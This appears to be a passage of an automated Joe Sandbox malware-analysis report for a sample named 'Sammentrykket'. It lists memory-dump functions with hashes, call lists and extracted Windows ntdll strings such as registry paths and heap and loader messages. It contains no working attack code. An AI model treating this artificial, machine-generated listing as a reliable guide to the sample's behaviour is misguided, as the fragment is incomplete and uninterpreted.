                • Opcode ID: 35b1821ba614015600b057f31400cfa0135a296e50712b355e1367c20d4c3f84
                • Instruction ID: 036c99bf428bc835990606765e7cb6a0fc7861522676316098ebd5d7574f8346
                • Opcode Fuzzy Hash: 35b1821ba614015600b057f31400cfa0135a296e50712b355e1367c20d4c3f84
                • Instruction Fuzzy Hash: A291FC31A04689EFDB02CFE8C4A0B9DFBF2FF59354F148089E5529B292C7399941DB11

                Control-flow Graph

                control_flow_graph 430 2091d2ec [basic-block edge list omitted; blocks in this function call 209dbd08, 20965050, 20962ab0, 20917220, 20943262, 20933bc0, 2091d736, 20962a80, 209dad61, 2091d8d0, 2091d64a, 20935d90, 20944ca6 and the API GetPEB]
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                • API String ID: 0-3532704233
                • Opcode ID: 7566fcb8922f9b4796cb63b5fcd9dfa805d16db6f9ba72a22f1dee4db6760061
                • Instruction ID: 2dc2da3dcc29dc7df3baca44a6a16416278a3c8b39b43f7aec5695d04924d2cf
                • Opcode Fuzzy Hash: 7566fcb8922f9b4796cb63b5fcd9dfa805d16db6f9ba72a22f1dee4db6760061
                • Instruction Fuzzy Hash: 36B1AEB260A3599FC711CFA8C880B4FB7E9AF84744F00496EF99AD7250D774DD848B92

                Control-flow Graph

                control_flow_graph 583 2091d02d [basic-block edge list omitted; blocks in this function call 20962a80, 20965050, 20962ab0, 209dadd6, 2091d736, 20933bc0, 209dad61, 2091d9a2, 2091daa8 and the API GetPEB]
                Strings
                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 2091D06F
                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 2091D263
                • @, xrefs: 2091D09D
                • @, xrefs: 2091D2B3
                • @, xrefs: 2091D24F
                • Control Panel\Desktop\LanguageConfiguration, xrefs: 2091D136
                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 2091D0E6
                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 2091D202
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                • API String ID: 0-1356375266
                • Opcode ID: a29df809ed02c2a8842a49cba6353f115c41e554fde569ab6efd0f6e0a375ea0
                • Instruction ID: 8315db8513661c88bc9cd8a129c9cacda0be988c8b60ac880df0a3711071bc69
                • Opcode Fuzzy Hash: a29df809ed02c2a8842a49cba6353f115c41e554fde569ab6efd0f6e0a375ea0
                • Instruction Fuzzy Hash: 68A16DB25093499FD321CFA4C981B5FF7E8BB84715F00492EF69A96240D778DA48CB93
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                • API String ID: 0-523794902
                • Opcode ID: 96c790c4bdcfe98d13dc7261d5a30e997c7ecf8aad0b7e919a1dcc12db030613
                • Instruction ID: 1afc7c62fda11c30f0cc5b4f0d6f755f562b93c3f3204cdf1d1240db5329fa49
                • Opcode Fuzzy Hash: 96c790c4bdcfe98d13dc7261d5a30e997c7ecf8aad0b7e919a1dcc12db030613
                • Instruction Fuzzy Hash: FA42DF723096499FC305CFA8C4A4B5AF7F9FF88204F1489A9F5978B2A1D738D981CB51

                Control-flow Graph

                control_flow_graph 920 2093b0d0 [basic-block edge list omitted; blocks in this function call 2093c4a0, 2093df36, 2094015c, 2099e692, 2095432e, 2093c7e7, 209423c4, 209688c0, 209301c0, 20965050, 2092fcf0, 20935d60, 209a3c57, 20939870, 2094e3c9 and the API GetPEB]
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                • API String ID: 0-122214566
                • Opcode ID: a119564e33fb6c981162ff674229dd712f9c6bb00a666b8315ee0287669bef74
                • Instruction ID: e38ffa2285e53d2fa359fc861c7ca3fe6da57faaff5ba4e9680b3a7f77a79bbe
                • Opcode Fuzzy Hash: a119564e33fb6c981162ff674229dd712f9c6bb00a666b8315ee0287669bef74
                • Instruction Fuzzy Hash: 5CC15771A042199BCB14EBE4C891BBFB7B4AF55340F1442A9EA239B391D778CD44CBA1

                Control-flow Graph

                control_flow_graph 1053 2094510f [basic-block edge list omitted; blocks in this function call 20948bd1, 20933bc0, 20935d90, 209688c0, 2096a8b0, 20965050, 209456e0 and the API GetPEB]
                Strings
                • Kernel-MUI-Number-Allowed, xrefs: 20945167
                • WindowsExcludedProcs, xrefs: 2094514A
                • Kernel-MUI-Language-SKU, xrefs: 2094534B
                • Kernel-MUI-Language-Allowed, xrefs: 2094519B
                • Kernel-MUI-Language-Disallowed, xrefs: 20945272
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                • API String ID: 0-258546922
                • Opcode ID: 92412f591a0c71f28eadf98ebad8411398e35a6e781aeb1655250cb64e99b58d
                • Instruction ID: c9e7cc27e27e156756ff484647ce2e0712015f1f1c027fcd2cf69c2e0ac8f3a9
                • Opcode Fuzzy Hash: 92412f591a0c71f28eadf98ebad8411398e35a6e781aeb1655250cb64e99b58d
                • Instruction Fuzzy Hash: 69F12672D01219EFCB15CFE8C981B9EBBFCEF58650F54406AE616A7211E6749E01CBA0
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                • API String ID: 0-379654539
                • Opcode ID: c3a8b4e31b6a3df108673dcd4763059bea619564a51d46863a22df196ba34531
                • Instruction ID: b51997f974ae44c2b74c3899d34e7077645cf550ab8034002b3b07560c8572a5
                • Opcode Fuzzy Hash: c3a8b4e31b6a3df108673dcd4763059bea619564a51d46863a22df196ba34531
                • Instruction Fuzzy Hash: 48C1AC72108B82CFE315CF94D540B5AB7E4FF85704F0049AAF9968B2A5E378CE45CB56
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                • API String ID: 0-1391187441
                • Opcode ID: 3addc773f606fb827f8ec500c39c41c29e7e0c5f25064f09eee0888c707496ed
                • Instruction ID: bca23d1b9fb692b8e9c217dc085886bdea62e0cb3e2cac3a0f243142a70b332e
                • Opcode Fuzzy Hash: 3addc773f606fb827f8ec500c39c41c29e7e0c5f25064f09eee0888c707496ed
                • Instruction Fuzzy Hash: F731A372A0010DFFCB11CBD8C888F9AB7B9FB45764F2440A5F516AB2A1D734ED81CA61
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID:
                • API String ID: 3446177414-0
                • Opcode ID: 360e9aaad31b5011124dc5ba1dcec650ddfea73c09422740e000e495fc45bf75
                • Instruction ID: 838a4efe2bf6e9e8c4f2005457d9993b0018d02ebfea0a614e90181b80c3e54a
                • Opcode Fuzzy Hash: 360e9aaad31b5011124dc5ba1dcec650ddfea73c09422740e000e495fc45bf75
                • Instruction Fuzzy Hash: 5651E130A44A06EFDB05CBE4D854BAEF7B8BF54315F2041AAE503A7290DB799A15DF80
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: FilterFullPath$UseFilter$\??\
                • API String ID: 0-2779062949
                • Opcode ID: 67de3906875b6fbe562b08ac5977bf7f736b3bb2e6c4f59b7dec0f4c11a174b3
                • Instruction ID: 94eaa5b8dbfa3a6f69777badff70e6b80f2c9fe7b5e8a768592cadfd8afc1e7d
                • Opcode Fuzzy Hash: 67de3906875b6fbe562b08ac5977bf7f736b3bb2e6c4f59b7dec0f4c11a174b3
                • Instruction Fuzzy Hash: 5AA170B29016299BDB21DFA4CC88BDAB7B8EF44714F1045EAE90AA7250D7359FC4CF50
                Strings
                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 209FB3AA
                • TargetNtPath, xrefs: 209FB3AF
                • GlobalizationUserSettings, xrefs: 209FB3B4
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                • API String ID: 0-505981995
                • Opcode ID: 121c09e080f3a6ee0b0d1685fac0e63ca0f190c303d7b73aacbcf26c774e76d8
                • Instruction ID: 0e8d96347c4480617abb38b21e0ab97ad0baa6d54f62e09e64fe35e9b598c1f9
                • Opcode Fuzzy Hash: 121c09e080f3a6ee0b0d1685fac0e63ca0f190c303d7b73aacbcf26c774e76d8
                • Instruction Fuzzy Hash: 30619032D4162DABDB21DF94CC8CF9AB7B8AB14710F4101E5E60AAB250C778DE84CF90
                Strings
                • RtlCreateActivationContext, xrefs: 20992803
                • SXS: %s() passed the empty activation context data, xrefs: 20992808
                • Actx , xrefs: 209532CC
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                • API String ID: 0-859632880
                • Opcode ID: ce8ae5eaf92858177da8bb1686ee3bab75a15fcc1d8907dc3d83ddf57e2bc004
                • Instruction ID: 6cd448c591bdbb9d610a2759406cb7c3c96f1bb5472dac55cf30c61bd5079c15
                • Opcode Fuzzy Hash: ce8ae5eaf92858177da8bb1686ee3bab75a15fcc1d8907dc3d83ddf57e2bc004
                • Instruction Fuzzy Hash: 2F31F2326002099BDB01CFAAD8D0F967BA8AB44754F5184A9FD06DF285CB74DD09CB90
                Strings
                • @, xrefs: 209AB2F0
                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 209AB2B2
                • GlobalFlag, xrefs: 209AB30F
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                • API String ID: 0-4192008846
                • Opcode ID: 032d1a9e05e5435d61e1997a156255a64a20581a6550b7c3a6974b72cc87f58f
                • Instruction ID: cebf2e511428bc722be3c62afbcc0df788e0c909a37cb74e1a7575bbd25ec002
                • Opcode Fuzzy Hash: 032d1a9e05e5435d61e1997a156255a64a20581a6550b7c3a6974b72cc87f58f
                • Instruction Fuzzy Hash: C5315AB1A01209AEDF00DFE4DC81BEEBBBCEF54744F4004A9E616A7245DB749E448B90
                Strings
                • @, xrefs: 209611C5
                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 2096119B
                • BuildLabEx, xrefs: 2096122F
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                • API String ID: 0-3051831665
                • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                • Instruction ID: 3d4291ed0168c76dc65d0222c11976fe88d3874cac8bf576fd1efbc798fb04c6
                • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                • Instruction Fuzzy Hash: 0131CDB2901619BFCB11CBE5CC41FEEBBBDEB84750F104025F616A72A0E734DA058BA0
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: @$@
                • API String ID: 0-149943524
                • Opcode ID: 6b40b1d4ddf672f9c2b547d2ab2c49ab08c2bee685d2cc921f6c92c86bb2179a
                • Instruction ID: 6e30886269646a3db17accf83b5137108fcaad934b1375724f7049c1d6c0eb27
                • Opcode Fuzzy Hash: 6b40b1d4ddf672f9c2b547d2ab2c49ab08c2bee685d2cc921f6c92c86bb2179a
                • Instruction Fuzzy Hash: 6C3279705083518BC724CF94C490B6EB7EAEF89744F10896EFA969B290E738DD44DF92
                Strings
                • RtlpResUltimateFallbackInfo Enter, xrefs: 2092A21B
                • RtlpResUltimateFallbackInfo Exit, xrefs: 2092A229
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                • API String ID: 0-2876891731
                • Opcode ID: 8cce9ca08b190c364089a4040359122609b779f6da2e7dfffbe8ad50d200d0a9
                • Instruction ID: d4db33832439fe924c70da9c50c7c74233b3a4653fb751f24f554672a51514ca
                • Opcode Fuzzy Hash: 8cce9ca08b190c364089a4040359122609b779f6da2e7dfffbe8ad50d200d0a9
                • Instruction Fuzzy Hash: 93419D32600A44DFE701CFE9D590B5A77B9EF85710F2140A5E966DB3A5E23ADD00CB50
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                • API String ID: 0-118005554
                • Opcode ID: efbeff7c1afa4a0d43b4027c80377d1ee5456e2205ef3e6690989285d583dfa1
                • Instruction ID: cb5bf0649279ba33f40f4b5cf4a4f214d5d30b929b0dd149f0dbc1433effe6b4
                • Opcode Fuzzy Hash: efbeff7c1afa4a0d43b4027c80377d1ee5456e2205ef3e6690989285d583dfa1
                • Instruction Fuzzy Hash: 993104312487409BD311CFE9D881B1AB7E8EF85720F008499FD66CB390EB34D905CB52
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: .Local\$@
                • API String ID: 0-380025441
                • Opcode ID: e5136b757700b0819cc324c4e3e836ec230baf56eddad38c537535a55f50d501
                • Instruction ID: f82956c6bf953ef8ec92cbf0ebeeafe186ece1ffb43421a432624c23dbdf73ec
                • Opcode Fuzzy Hash: e5136b757700b0819cc324c4e3e836ec230baf56eddad38c537535a55f50d501
                • Instruction Fuzzy Hash: FE31AF71549B05AFC310CFA9C8C1B5BFFE8FB85654F10492EF9A683250D638DE089B92
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID:
                • API String ID: 3446177414-0
                • Opcode ID: ea945e1cea6eec92a43e59522dfc2fd553a3ed24a8e17158e721feaa94d443b5
                • Instruction ID: 9dc584a2b56f47f071938f00bc1d1d58b32afc513a29d16fb4664e8338b760d5
                • Opcode Fuzzy Hash: ea945e1cea6eec92a43e59522dfc2fd553a3ed24a8e17158e721feaa94d443b5
                • Instruction Fuzzy Hash: 80B101B56097808FD354CF68C490A5AFBF1BB88304F1489AEF99A97362D335E945CF42
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID:
                • API String ID: 3446177414-0
                • Opcode ID: b2a0c7ef3b2c4326546f9cefb3a7800debb316b508f53958c41122e22183684d
                • Instruction ID: cacd1c5b06cd4608baa322be0c1f8d0b03976f9ad122f891ba3601268b3f115a
                • Opcode Fuzzy Hash: b2a0c7ef3b2c4326546f9cefb3a7800debb316b508f53958c41122e22183684d
                • Instruction Fuzzy Hash: 9DF0FA32200608BFD331CB98CC05F9BFBFDEF80B00F080558B542830A1C6B0E94ACAA0
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: #%u
                • API String ID: 0-232158463
                • Opcode ID: d73597a37ae89b9104d7f135808830f6b5aec640ab25aa965a3feea5cbf664c0
                • Instruction ID: e865c0068ac4e2babd8b5d0bb2e943f3ab44b435520fe702a6e58f25f4db73b2
                • Opcode Fuzzy Hash: d73597a37ae89b9104d7f135808830f6b5aec640ab25aa965a3feea5cbf664c0
                • Instruction Fuzzy Hash: FB712971A001499FDB05CFE8D991FAEB7F8AF58704F144065E906E7251EB38ED41CBA0
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                • Instruction ID: 6308e9bc65a4d7feb22e81d8d008a2f201a44afa6cda75707b766d91137cb782
                • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                • Instruction Fuzzy Hash: 26514C71505711AFC321CF95C841B6BBBF8FF48710F00892AFA96976A0E774D914CB91
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 999ee7e2bc374b6d80196e964e83bc2a2e99e6afa9eb2a0cc454eaa42ef003d2
                • Instruction ID: 9f782649afd99028c1b5da9a98c8a15605ec024bbefb9bf9de897db6409ddf4d
                • Opcode Fuzzy Hash: 999ee7e2bc374b6d80196e964e83bc2a2e99e6afa9eb2a0cc454eaa42ef003d2
                • Instruction Fuzzy Hash: 8142A4B2A006158FCB08CF99C490AADF7B6FF88314B14C59DE552AB361D735ED42CB90
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5b9cae3c81254a2c225b1794fe31b81925dac23ec8487b817ebb1ca0971e681f
                • Instruction ID: 0eb7f2433c5c8be06176a4799094c23bcbabd91e25e9da46af0e8b966925e28b
                • Opcode Fuzzy Hash: 5b9cae3c81254a2c225b1794fe31b81925dac23ec8487b817ebb1ca0971e681f
                • Instruction Fuzzy Hash: B0329F76E01219DBCB14CFE8C891BAEBBB5FF94714F140169E906AB391E7399D01CB90
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8b446115987b3f5791382b4c574ff67aa666a05e516953d7a6e8e39a74165ea1
                • Instruction ID: dfa3bbd62412b484a48bc3f138f928aa4654bc3871bbd4159bc5ef0545273e33
                • Opcode Fuzzy Hash: 8b446115987b3f5791382b4c574ff67aa666a05e516953d7a6e8e39a74165ea1
                • Instruction Fuzzy Hash: A1C155702093418FD360CF55C494BABB7E8BF98304F50496DE99A877A1E774EA08CF92
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 03a28516e7b7db1911d666131419e18f2033ce0c213bb1ab6fa276fb030988b0
                • Instruction ID: 50f2314f375876c10a901ecf37a0fe99a9712822e79f01b470e9e1fe428320f1
                • Opcode Fuzzy Hash: 03a28516e7b7db1911d666131419e18f2033ce0c213bb1ab6fa276fb030988b0
                • Instruction Fuzzy Hash: 47A1D170B0061A9FD714CFE9C9D1BABB7B9FF84305F504069E91697391EB38A911DB80
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
